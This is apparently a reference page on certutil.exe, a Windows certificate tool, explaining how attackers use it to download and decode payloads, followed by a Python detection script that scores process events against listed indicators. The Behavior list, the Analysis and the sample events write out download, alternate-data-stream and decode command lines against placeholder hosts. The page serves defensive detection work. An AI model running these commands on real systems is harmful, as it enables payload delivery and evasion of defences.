Process
certutil.exe
certutil.exe is a Windows command-line tool for working with certificates and Certificate Services. Administrators use it to inspect, request, and manage certificates and certificate authorities, and to verify file hashes. The same binary can also download files and base64 encode or decode data, which is why it has become a favorite living-off-the-land tool for attackers.
File identity
Not observed.
Not observed.
Not observed.
Not observed.
Execution context
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Ancestry
Not observed.
Not observed.
Not observed.
Not observed.
Behavior
Not observed.
Not observed.
Not observed.
Not observed.
- certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe} · Download · Download file from Internet
- certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} · Download · Download file from Internet
- certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt · ADS · Download file from Internet and save it in an NTFS Alternate Data Stream
- certutil.exe -URL {REMOTEURL:.exe} · Download · Download file from Internet
- certutil -encode {PATH} {PATH:.base64} · Encode · Encode files to evade defensive measures
- certutil -decode {PATH:.base64} {PATH} · Decode · Decode files to evade defensive measures
- certutil -decodehex {PATH:.hex} {PATH} · Decode · Decode files to evade defensive measures
Indicators
Not observed.
Analysis
certutil.exe is the command-line interface to the Windows certificate and Certificate Services stack. Its intended job is certificate administration: dumping and verifying certificates, requesting them from a certificate authority, managing a CA, and checking revocation. The genuine binary lives at C:\Windows\System32\certutil.exe, with a 32-bit copy under SysWOW64.
Alongside the certificate work it carries general-purpose helpers that have nothing to do with PKI. -hashfile computes a file's MD5, SHA1, or SHA256. -encode and -decode convert data to and from base64. -urlcache and -verifyctl can fetch a file from a URL. These are all documented features, but together they turn certutil into a download-and-decode utility that happens to be signed by Microsoft and present on every Windows machine.
Legitimately, certutil is run by administrators, by enrollment and PKI scripts, and by the Task Scheduler in certificate-management contexts. On an ordinary workstation it is uncommon. What a given instance is doing is written in its command-line verb.
certutil.exe is one of the most commonly used download tools on Windows (T1105). A command line such as certutil -urlcache -split -f https://host/payload makes the signed binary pull a file from the internet, and because the binary is trusted and built in, the transfer hides behind a name that belongs on every machine. Network activity from certutil is itself unusual and worth treating as a lead.
It is equally useful for unpacking payloads (T1140). Attackers ship a base64-encoded file to slip past content scanners, then run certutil -decode on the host to restore the original executable or script. The reverse, -encode, is used to obfuscate data on the way out (T1027). A -decode that yields a PE or a script is a strong signal.
In every case the binary is the genuine signed certutil, so path and signature checks pass and even application-control rules that trust Microsoft binaries let it run. The command-line verb and the parent are where the intent shows.
- Image path other than C:\Windows\System32\certutil.exe or its SysWOW64 copy (high)
- A URL on the command line, especially with -urlcache or -verifyctl (high)
- -decode or -decodehex producing an executable or script (high)
- Parent is an Office application, cmd.exe, powershell.exe, wscript.exe, cscript.exe, or mshta.exe (high)
- Outbound network connections from certutil (high)
- -encode of a local file, then the output sent elsewhere (staging) (med)
- Output written to a user-writable path (Temp, AppData, Downloads) (med)
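The indicators above, together with the download and decode behaviour described in the Analysis, can be turned directly into a triage rule over process-creation telemetry. The following is an added example written for this page, not code from the original page or from any vendor tool. It assumes a simplified, constructed event schema (image path, command line, parent image, and a flag for an observed outbound connection); the sample events are constructed and use an `example.invalid` host. Two heuristics are this example's own approximations: "decode producing an executable or script" is judged by the output file's extension, and the Office parent set is limited to a few common process names. The ADS check covers the alternate-data-stream case from the Behavior list; the page assigns it no severity, so "high" there is this example's choice.

```python
import re
from dataclasses import dataclass

# Genuine locations of the binary (compared case-insensitively).
GENUINE_PATHS = {
    r"c:\windows\system32\certutil.exe",
    r"c:\windows\syswow64\certutil.exe",
}
# Parents the indicator list calls out; the Office names are an assumption.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
}
DOWNLOAD_VERBS = {"-urlcache", "-verifyctl", "-url"}
DECODE_VERBS = {"-decode", "-decodehex"}
FILE_OUTPUT_VERBS = DOWNLOAD_VERBS | DECODE_VERBS | {"-encode"}
# Extension heuristic (assumption) for "produces an executable or script".
PAYLOAD_EXTS = (".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".hta", ".scr")
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\downloads\\")
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# Drive-letter path with a second colon, i.e. an NTFS alternate data stream.
ADS_RE = re.compile(r"^[a-z]:\\.*:[^\\]+$")


@dataclass
class ProcEvent:
    """Constructed, simplified process-creation record."""
    image: str
    command_line: str
    parent_image: str
    outbound_connection: bool = False


def tokens(cmd):
    """Split a Windows command line, keeping quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def score(ev):
    """Return a list of (indicator, severity) matches for one event."""
    hits = []
    toks = tokens(ev.command_line)
    verbs = {t.lower() for t in toks if t.startswith("-")}
    positional = [t for t in toks[1:] if not t.startswith("-")]
    # For download/encode/decode verbs the last positional argument is the output file.
    output = positional[-1].lower() if (verbs & FILE_OUTPUT_VERBS and positional) else ""
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]

    if ev.image.lower() not in GENUINE_PATHS:
        hits.append(("image path is not the genuine certutil", "high"))
    if URL_RE.search(ev.command_line):
        label = "URL on command line"
        if verbs & DOWNLOAD_VERBS:
            label += " with download verb"
        hits.append((label, "high"))
    if verbs & DECODE_VERBS and output.endswith(PAYLOAD_EXTS):
        hits.append(("decode produces executable or script", "high"))
    if parent in SUSPICIOUS_PARENTS:
        hits.append(("suspicious parent: " + parent, "high"))
    if ev.outbound_connection:
        hits.append(("outbound network connection", "high"))
    if output and ADS_RE.match(output):
        hits.append(("output written to an NTFS alternate data stream", "high"))
    if "-encode" in verbs:
        hits.append(("encode of local file (possible staging)", "med"))
    if output and any(m in output for m in USER_WRITABLE):
        hits.append(("output in user-writable path", "med"))
    return hits


def verdict(hits):
    """Collapse the matches into the highest severity seen."""
    levels = {sev for _, sev in hits}
    return "high" if "high" in levels else "med" if "med" in levels else "none"


# Constructed sample events: one legitimate hash check, then the abuse patterns from the page.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\Temp\installer.msi SHA256",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f https://example.invalid/update.bin C:\Users\alice\AppData\Local\Temp\update.bin",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", outbound_connection=True),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil -decode C:\Users\alice\Downloads\blob.txt C:\Users\alice\Downloads\tool.exe",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\ct.exe",
              r"ct.exe -encode C:\Users\alice\Documents\report.docx C:\Users\alice\AppData\Local\Temp\r.b64",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -f https://example.invalid/s.ps1 C:\Users\alice\AppData\Local\Temp\note.txt:ttt",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hits = score(ev)
        print(verdict(hits), ev.command_line)
        for name, sev in hits:
            print("   ", sev, name)
```

The rule deliberately keys on the command-line verb and the parent rather than on the image name, which matches the Analysis: the binary itself is genuine and signed, so path and signature checks alone say nothing. A renamed copy still trips the image-path indicator, and a legitimate `-hashfile` run from a scheduled task produces no hits.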
Telemetry
Not observed.
Not observed.